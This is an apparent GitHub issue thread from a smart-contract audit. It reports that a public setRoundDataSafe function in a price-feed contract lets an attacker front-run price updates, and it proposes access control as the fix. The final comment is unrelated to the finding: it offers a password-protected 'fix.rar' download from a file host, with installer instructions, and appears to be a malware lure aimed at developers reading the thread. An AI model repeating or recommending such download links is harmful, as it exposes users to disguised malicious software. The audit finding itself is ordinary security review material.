### ISSUE TITLE
admin - Front-Running Risks at setRoundDataSafe for CustomAggregatorV3CompatibleFeed contract

### ISSUE THREAD

**Issue by sherlock-admin2** [sherlock-audit/2024-08-midas-minter-redeemer-judging#9]
admin

High

# Front-Running Risks at setRoundDataSafe for CustomAggregatorV3CompatibleFeed contract

### Summary

Link: https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/feeds/CustomAggregatorV3CompatibleFeed.sol#L108

The contract is vulnerable to front-running attacks, particularly in the context of the setRoundDataSafe function. Since this function is public, a malicious actor could observe an incoming transaction in the mempool, calculate the deviation, and front-run the transaction with their own price update that results in the victim's transaction being reverted due to a deviation check failure.

### Root Cause

Lack of access control

### Impact

Front running attack results in the victim's transaction being reverted due to a deviation check failure.

### Mitigation

Add access control in setRoundDataSafe function.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
